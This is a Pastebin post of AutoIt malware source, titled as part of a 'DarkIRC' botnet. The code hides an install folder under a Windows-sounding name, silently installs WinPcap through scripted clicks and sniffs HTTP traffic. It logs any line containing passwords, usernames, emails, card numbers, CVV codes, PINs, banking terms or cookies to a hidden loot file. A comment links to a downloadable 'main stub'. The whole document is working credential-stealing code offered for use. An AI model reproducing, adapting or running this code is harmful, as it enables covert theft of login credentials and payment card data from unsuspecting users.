API tools faq
paste
KekSec

[AUTOSNIFFz] ORIGINAL DARKIRC BOTNET - CODED BY FREAK

KekSec
Feb 25th, 2021 (edited)
1,542
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
AutoIt 14.55 KB | None | 0 0
raw download clone embed print report
  1. ; MAIN STUB HERE https://anonfiles.com/Pbn1G269q0/bot_au3
  2. #NoTrayIcon
  3. #Region ;**** Directives created by AutoIt3Wrapper_GUI ****
  4. #AutoIt3Wrapper_Outfile=stub.exe
  5. #AutoIt3Wrapper_Compression=4
  6. #AutoIt3Wrapper_UseUpx=y
  7. #AutoIt3Wrapper_Res_Language=1033
  8. #AutoIt3Wrapper_Res_requestedExecutionLevel=asInvoker
  9. #AutoIt3Wrapper_Run_Tidy=y
  10. #Tidy_Parameters=/gd /reel /sci 0 /kv 5 /sf
  11. #AutoIt3Wrapper_Tidy_Stop_OnError=n
  12. #AutoIt3Wrapper_Run_Au3Stripper=y
  13. #Au3Stripper_Parameters=/so /mi 5 /mo
  14. #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI ****
  15. Opt("ExpandEnvStrings", 1)
  16.  
  17. Global $installdir = @AppDataDir & '\Windows Shell Common Binary'
  18. Global $lootLoc = $installdir & "\dump.dat"
  19. Global $sniffopt = "tcp port (80 or 8080 or 8888 or 8181)"
  20. Global Const $sMutex = BinaryToString("0x1337FF207F2838EEEBD6E4F2EF23323727FAEDCBECFE31263F25D4F1C6E4F0EF2A343225E9EFD0E6FF7A2B2125E4E5D0E8F137253F41FF1337")
  21.  
  22. _Singleton($sMutex)
  23. If Not FileExists(@SystemDir & "\wpcap.dll") Then
  24.     InetGet("https://www.winpcap.org/install/bin/WinPcap_4_1_3.exe", @TempDir & "\WinPcap_4_1_3.exe")
  25.     Run(@TempDir & "\WinPcap_4_1_3.exe")
  26.     WinWaitActive("WinPcap 4.1.3 Setup", "Welcome to the WinPcap")
  27.     Send("!n")
  28.     WinWaitActive("WinPcap 4.1.3 Setup", "License Agreement")
  29.     Send("!a")
  30.     WinWaitActive("WinPcap 4.1.3 Setup", "Installation options")
  31.     ControlClick("WinPcap 4.1.3 Setup", "Installation options", "[CLASS:Button; INSTANCE:2]")
  32.     WinWaitActive("WinPcap 4.1.3 Setup", "Completing the WinPcap")
  33.     Send("!f")
  34. EndIf
  35. installPCAP()
  36. $winpcap = _PcapSetup()
  37. $pcap_devices = _PcapGetDeviceList()
  38. $iface = 0
  39. $pcap = _PcapStartCapture($pcap_devices[$iface][0], "host " & $pcap_devices[$iface][7] & " and " & $sniffopt, 0, 65536, 2 ^ 24, 0)
  40. Dim $keywords[20]
  41. $keywords[0] = "GET /"
  42. $keywords[1] = "POST /"
  43. $keywords[2] = "Host: "
  44. $keywords[3] = "User-Agent: "
  45. $keywords[4] = "Content-"
  46. $keywords[5] = "password="
  47. $keywords[6] = "user_name="
  48. $keywords[7] = "user="
  49. $keywords[8] = "Username="
  50. $keywords[9] = "User="
  51. $keywords[10] = "login="
  52. $keywords[11] = "email="
  53. $keywords[12] = "username="
  54. $keywords[13] = "holder="
  55. $keywords[14] = "number="
  56. $keywords[15] = "cvv="
  57. $keywords[16] = "pin="
  58. $keywords[17] = "transaction"
  59. $keywords[18] = "bank"
  60. $keywords[19] = "Cookie: "
  61. $lootHandle = FileOpen($lootLoc, 1)
  62. $sPacketText = ""
  63. $oldPacketText = ""
  64. While True
  65.     $aPacket = _TCP_Recv($pcap)
  66.     If UBound($aPacket) > 20 Then
  67.         $sPacketText = BinaryToString("0x" & $aPacket[20])
  68.         If $sPacketText = $oldPacketText Then
  69.             Sleep(250)
  70.             ContinueLoop
  71.         EndIf
  72.         If StringLen($sPacketText) > 13 Then
  73.             For $key = 0 To UBound($keywords) - 1
  74.                 If StringInStr($sPacketText, $keywords[$key]) Then
  75.                     If Dec(Hex(BinaryToString("0x" & $aPacket[14]))) = 6667 Then ExitLoop
  76.                     $aPacketText = StringSplit(StringReplace($sPacketText, @CR, ""), @LF)
  77.                     For $aPT = 1 To UBound($aPacketText) - 1
  78.                         If StringInStr($aPacketText[$aPT], $keywords[$key]) Then
  79.                             FileWriteLine($lootHandle, $aPacketText[$aPT])
  80.                             FileFlush($lootHandle)
  81.                             $oldPacketText = $sPacketText
  82.                         EndIf
  83.                     Next
  84.                     $oldPacketText = $sPacketText
  85.                 Else
  86.                     ConsoleWrite($sPacketText & @CRLF)
  87.                 EndIf
  88.             Next
  89.         EndIf
  90.     EndIf
  91.     $oldPacketText = $sPacketText
  92. WEnd
  93. Func _PcapGetDeviceList()
  94.     Local $alldevs = DllStructCreate("ptr")
  95.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_findalldevs_ex", "str", "rpcap://", "ptr", 0, "ptr", DllStructGetPtr($alldevs), "ptr", DllStructGetPtr($Pcap_errbuf))
  96.     If (@error > 0) Then Return -1
  97.     If $r[0] = -1 Then Return -1
  98.     Local $next = DllStructGetData($alldevs, 1)
  99.     Local $list[1][14]
  100.     Local $i = 0
  101.     While ($next <> 0)
  102.         Local $pcap_if = DllStructCreate("ptr next;ptr name;ptr desc;ptr addresses;uint flags", $next)
  103.         Local $len_name = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 2))
  104.         Local $len_desc = DllCall("kernel32.dll", "int", "lstrlen", "ptr", DllStructGetData($pcap_if, 3))
  105.         $list[$i][0] = DllStructGetData(DllStructCreate("char[" & ($len_name[0] + 1) & "]", DllStructGetData($pcap_if, 2)), 1)
  106.         $list[$i][1] = DllStructGetData(DllStructCreate("char[" & ($len_desc[0] + 1) & "]", DllStructGetData($pcap_if, 3)), 1)
  107.         Local $next_addr = DllStructGetData($pcap_if, "addresses")
  108.         Local $device = StringTrimLeft($list[$i][0], 8)
  109.         Local $snames = DllStructCreate("char Name[" & (StringLen($device) + 1) & "]")
  110.         DllStructSetData($snames, 1, $device)
  111.         Local $handle = DllCall("packet.dll", "ptr:cdecl", "PacketOpenAdapter", "ptr", DllStructGetPtr($snames))
  112.         If IsPtr($handle[0]) Then
  113.             Local $packetoiddata = DllStructCreate("ulong oid;ulong length;ubyte data[6]")
  114.             DllStructSetData($packetoiddata, 1, 0x01010102)
  115.             DllStructSetData($packetoiddata, 2, 6)
  116.             Local $status = DllCall("packet.dll", "byte:cdecl", "PacketRequest", "ptr", $handle[0], "byte", 0, "ptr", DllStructGetPtr($packetoiddata))
  117.             If $status[0] Then
  118.                 Local $mac = DllStructGetData($packetoiddata, 3)
  119.                 $list[$i][6] = StringMid($mac, 3, 2) & ":" & StringMid($mac, 5, 2) & ":" & StringMid($mac, 7, 2) & ":" & StringMid($mac, 9, 2) & ":" & StringMid($mac, 11, 2) & ":" & StringMid($mac, 13, 2)
  120.             EndIf
  121.             Local $nettype = DllStructCreate("uint type;uint64 speed")
  122.             $status = DllCall("packet.dll", "byte:cdecl", "PacketGetNetType", "ptr", $handle[0], "ptr", DllStructGetPtr($nettype))
  123.             If $status[0] Then
  124.                 $list[$i][5] = DllStructGetData($nettype, 2)
  125.             EndIf
  126.             DllCall("packet.dll", "none:cdecl", "PacketCloseAdapter", "ptr", $handle[0])
  127.         EndIf
  128.         Local $pcap = _PcapStartCapture($list[$i][0], "host 1.2.3.4", 0, 32)
  129.         If IsPtr($pcap) Then
  130.             Local $types = _PcapGetLinkType($pcap)
  131.             If IsArray($types) Then
  132.                 $list[$i][2] = $types[0]
  133.                 $list[$i][3] = $types[1]
  134.                 $list[$i][4] = $types[2]
  135.             EndIf
  136.             _PcapStopCapture($pcap)
  137.         EndIf
  138.         While $next_addr <> 0
  139.             Local $pcap_addr = DllStructCreate("ptr next;ptr addr;ptr netmask;ptr broadaddr;ptr dst", $next_addr)
  140.             Local $j, $addr
  141.             For $j = 2 To 4
  142.                 $addr = _PcapSock2addr(DllStructGetData($pcap_addr, $j))
  143.                 If StringLen($addr) > 15 Then
  144.                     $list[$i][$j + 8] = $addr
  145.                 ElseIf StringLen($addr) > 6 Then
  146.                     $list[$i][$j + 5] = $addr
  147.                 EndIf
  148.             Next
  149.             $next_addr = DllStructGetData($pcap_addr, 1)
  150.         WEnd
  151.         $list[$i][13] = DllStructGetData($pcap_if, 5)
  152.         $next = DllStructGetData($pcap_if, 1)
  153.         $i += 1
  154.         If $next <> 0 Then ReDim $list[$i + 1][14]
  155.     WEnd
  156.     DllCall($Pcap_dll, "none:cdecl", "pcap_freealldevs", "ptr", DllStructGetData($alldevs, 1))
  157.     Return $list
  158. EndFunc   ;==>_PcapGetDeviceList
  159. Func _PcapGetLinkType($pcap)
  160.     If Not IsPtr($pcap) Then Return -1
  161.     Local $type[3]
  162.     Local $t = DllCall($Pcap_dll, "int:cdecl", "pcap_datalink", "ptr", $pcap)
  163.     $type[0] = $t[0]
  164.     Local $name = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_name", "int", $t[0])
  165.     $type[1] = $name[0]
  166.     Local $desc = DllCall($Pcap_dll, "str:cdecl", "pcap_datalink_val_to_description", "int", $t[0])
  167.     $type[2] = $desc[0]
  168.     Return $type
  169. EndFunc   ;==>_PcapGetLinkType
  170. Func _PcapGetPacket($pcap) ; return 0: timeout, -1:error, -2:EOF in file or if successfull array[0]=time [1]=captured len [2]=packet len [3]=packet data
  171.     If Not IsPtr($pcap) Then Return -1
  172.     $Pcap_ptrhdr = DllStructCreate("ptr")
  173.     $Pcap_ptrpkt = DllStructCreate("ptr")
  174.     Local $pk[4]
  175.     Local $res = DllCall($Pcap_dll, "int:cdecl", "pcap_next_ex", "ptr", $pcap, "ptr", DllStructGetPtr($Pcap_ptrhdr), "ptr", DllStructGetPtr($Pcap_ptrpkt))
  176.     If ($res[0] <> 1) Then Return $res[0]
  177.     Local $pkthdr = DllStructCreate("int s;int us;int caplen;int len", DllStructGetData($Pcap_ptrhdr, 1))
  178.     Local $packet = DllStructCreate("ubyte[" & DllStructGetData($pkthdr, 3) & "]", DllStructGetData($Pcap_ptrpkt, 1))
  179.     Local $time_t = Mod(DllStructGetData($pkthdr, 1) + $Pcap_timebias, 86400)
  180.     $pk[0] = StringFormat("%02d:%02d:%02d.%06d", Int($time_t / 3600), Int(Mod($time_t, 3600) / 60), Mod($time_t, 60), DllStructGetData($pkthdr, 2))
  181.     $pk[1] = DllStructGetData($pkthdr, 3)
  182.     $pk[2] = DllStructGetData($pkthdr, 4)
  183.     $pk[3] = DllStructGetData($packet, 1)
  184.     $Pcap_statV += $pk[2]
  185.     $Pcap_statN += 1
  186.     Return $pk
  187. EndFunc   ;==>_PcapGetPacket
  188. Func _PcapSendPacket($pcap, $data) ; data in Binary Format
  189.     If Not IsPtr($pcap) Then Return -1
  190.     Local $databuffer = DllStructCreate("ubyte[" & BinaryLen($data) & "]")
  191.     DllStructSetData($databuffer, 1, $data)
  192.     Local $r = DllCall($Pcap_dll, "int:cdecl", "pcap_sendpacket", "ptr", $pcap, "ptr", DllStructGetPtr($databuffer), "int", BinaryLen($data))
  193.     Return $r[0]
  194. EndFunc   ;==>_PcapSendPacket
  195. Func _PcapSetup()    ; return WinPCAP version as full text or -1 if winpcap is not installed, and opens dll
  196.     If Not FileExists(@SystemDir & "\wpcap.dll") Then Return -1
  197.     Global $Pcap_dll = DllOpen(@SystemDir & "\wpcap.dll")
  198.     Global $Pcap_errbuf = DllStructCreate("char[256]")
  199.     Global $Pcap_ptrhdr = 0
  200.     Global $Pcap_ptrpkt = 0
  201.     Global $Pcap_statV        ; Total volume captured
  202.     Global $Pcap_statN        ; Total number of packets captured
  203.     Global $Pcap_starttime    ; Start time of Capture
  204.     Global $Pcap_timebias = (2 ^ 32 - RegRead("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation", "ActiveTimeBias")) * 60
  205.     Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_lib_version")
  206.     If (@error > 0) Then Return -1
  207.     Return $v[0]
  208. EndFunc   ;==>_PcapSetup
  209. Func _PcapSock2addr($sockaddr_ptr)
  210.     If ($sockaddr_ptr = 0) Then Return ""
  211.     Local $sockaddr = DllStructCreate("ushort family;char data[14]", $sockaddr_ptr)
  212.     Local $family = DllStructGetData($sockaddr, 1)
  213.     If ($family = 2) Then
  214.         Local $sockaddr_in = DllStructCreate("short family;ushort port;ubyte addr[4];char zero[8]", $sockaddr_ptr)
  215.         Return DllStructGetData($sockaddr_in, 3, 1) & "." & DllStructGetData($sockaddr_in, 3, 2) & "." & DllStructGetData($sockaddr_in, 3, 3) & "." & DllStructGetData($sockaddr_in, 3, 4)
  216.     EndIf
  217.     If ($family = 23) Then
  218.         Local $sockaddr_in6 = DllStructCreate("ushort family;ushort port;uint flow;ubyte addr[16];uint scope", $sockaddr_ptr)
  219.         Local $bin = DllStructGetData($sockaddr_in6, 4)
  220.         Local $i, $ipv6
  221.         For $i = 0 To 7
  222.             $ipv6 &= StringMid($bin, 3 + $i * 4, 4) & ":"
  223.         Next
  224.         Return StringTrimRight($ipv6, 1)
  225.     EndIf
  226.     Return ""
  227. EndFunc   ;==>_PcapSock2addr
  228. Func _PcapStartCapture($DeviceName, $filter = "", $promiscuous = 0, $PacketLen = 65536, $buffersize = 0, $realtime = 1)
  229.     Local $handle = DllCall($Pcap_dll, "ptr:cdecl", "pcap_open", "str", $DeviceName, "int", $PacketLen, "int", $promiscuous, "int", 1000, "ptr", 0, "ptr", DllStructGetPtr($Pcap_errbuf))
  230.     If (@error > 0) Then Return -1
  231.     If ($handle[0] = 0) Then Return -1
  232.     DllCall($Pcap_dll, "int:cdecl", "pcap_setnonblock", "ptr", $handle[0], "int", 1, "ptr", DllStructGetPtr($Pcap_errbuf))
  233.     If ($filter <> "") Then
  234.         Local $fcode = DllStructCreate("UINT;ptr")
  235.         Local $comp = DllCall($Pcap_dll, "int:cdecl", "pcap_compile", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode), "str", $filter, "int", 1, "int", 0)
  236.         If ($comp[0] = -1) Then
  237.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  238.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  239.             _PcapStopCapture($handle[0])
  240.             Return -1
  241.         EndIf
  242.         Local $set = DllCall($Pcap_dll, "int:cdecl", "pcap_setfilter", "ptr", $handle[0], "ptr", DllStructGetPtr($fcode))
  243.         If ($set[0] = -1) Then
  244.             Local $v = DllCall($Pcap_dll, "str:cdecl", "pcap_geterr", "ptr", $handle[0])
  245.             DllStructSetData($Pcap_errbuf, 1, "Filter: " & $v[0])
  246.             _PcapStopCapture($handle[0])
  247.             Return -1
  248.             DllCall($Pcap_dll, "none:cdecl", "pcap_freecode", "ptr", $fcode)
  249.         EndIf
  250.     EndIf
  251.     If $buffersize > 0 Then DllCall($Pcap_dll, "int:cdecl", "pcap_setbuff", "ptr", $handle[0], "int", $buffersize)
  252.     If $realtime Then DllCall($Pcap_dll, "int:cdecl", "pcap_setmintocopy", "ptr", $handle[0], "int", 1)
  253.     $Pcap_statV = 0
  254.     $Pcap_statN = 0
  255.     $Pcap_starttime = TimerInit()
  256.     Return $handle[0]
  257. EndFunc   ;==>_PcapStartCapture
  258. Func _PcapStopCapture($pcap)
  259.     If Not IsPtr($pcap) Then Return
  260.     DllCall($Pcap_dll, "none:cdecl", "pcap_close", "ptr", $pcap)
  261. EndFunc   ;==>_PcapStopCapture
  262. Func _Singleton($occurenceName, $flag = 0)
  263.     Local $ERROR_ALREADY_EXISTS = 183
  264.     $occurenceName = StringReplace($occurenceName, "\", "") ; to avoid error
  265.     Local $handle = DllCall("kernel32.dll", "int", "CreateSemaphore", "int", 0, "long", 1, "long", 1, "str", $occurenceName)
  266.     ;    Local $handle = DllCall("kernel32.dll", "int", "CreateMutex", "int", 0, "long", 1, "str", $occurenceName)
  267.     Local $lastError = DllCall("kernel32.dll", "int", "GetLastError")
  268.     If $lastError[0] = $ERROR_ALREADY_EXISTS Then
  269.         If $flag = 0 Then
  270.             Exit -1
  271.         Else
  272.             SetError($lastError[0]) ;<---flag <>0 so set @error to $ERROR_ALREADY_EXISTS
  273.             Return 0
  274.         EndIf
  275.     EndIf
  276.     Return $handle[0]
  277. EndFunc   ;==>_Singleton
  278.  
  279. Func _TCP_Recv($hCapture, $iInstance = 0, $iTimeOut = 3000)
  280.     Local $blPacketCaptured = False, $iTimer_Capture, $aPacket, $iPacket
  281.     $iTimer_Capture = TimerInit()
  282.     While (TimerDiff($iTimer_Capture) < $iTimeOut Or $iTimeOut = -1)
  283.         $aPacket = _PcapGetPacket($hCapture)
  284.         If IsArray($aPacket) Then
  285.             If $iPacket = $iInstance Then
  286.                 Local $aTCPPacket[21]
  287.                 $aTCPPacket[0] = StringMid($aPacket[3], 3, 12) ;Destination Mac Address
  288.                 $aTCPPacket[1] = StringMid($aPacket[3], 15, 12) ;Source Mac Address
  289.                 $aTCPPacket[2] = StringMid($aPacket[3], 27, 4) ;Type
  290.                 $aTCPPacket[3] = StringMid($aPacket[3], 31, 2) ;Version & Header length
  291.                 $aTCPPacket[4] = StringMid($aPacket[3], 33, 2) ;Differientiated Services Field
  292.                 $aTCPPacket[5] = StringMid($aPacket[3], 35, 4) ;Total Length
  293.                 $aTCPPacket[6] = StringMid($aPacket[3], 39, 4) ;Identification
  294.                 $aTCPPacket[7] = StringMid($aPacket[3], 43, 4) ;Fragment offset
  295.                 $aTCPPacket[8] = StringMid($aPacket[3], 47, 2) ;Time to live
  296.                 $aTCPPacket[9] = StringMid($aPacket[3], 49, 2) ;Protocol
  297.                 $aTCPPacket[10] = StringMid($aPacket[3], 51, 4) ;Header checksum
  298.                 $aTCPPacket[11] = StringMid($aPacket[3], 55, 8) ;Source IP Address
  299.                 $aTCPPacket[12] = StringMid($aPacket[3], 63, 8) ;Destination IP Address
  300.                 $aTCPPacket[13] = StringMid($aPacket[3], 71, 4) ;Source port
  301.                 $aTCPPacket[14] = StringMid($aPacket[3], 75, 4) ;Destination port
  302.                 $aTCPPacket[15] = StringMid($aPacket[3], 79, 8) ;Sequence number
  303.                 $aTCPPacket[16] = StringMid($aPacket[3], 87, 8) ;Acknowledgment number
  304.                 $aTCPPacket[17] = StringMid($aPacket[3], 95, 4) ;Flags
  305.                 $aTCPPacket[18] = StringMid($aPacket[3], 99, 4) ;Window size value
  306.                 $aTCPPacket[19] = StringMid($aPacket[3], 103, 4) ;Checksum
  307.                 $aTCPPacket[20] = StringTrimLeft($aPacket[3], 110) ;Data
  308.                 Return $aTCPPacket
  309.             EndIf
  310.             $iPacket += 1
  311.         EndIf
  312.     WEnd
  313.     Return -1
  314. EndFunc   ;==>_TCP_Recv
  315.  
  316. Func installPCAP()
  317.     DirCreate($installdir)
  318.     FileSetAttrib($installdir, "+SH")
  319. EndFunc   ;==>installPCAP
  320.  
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!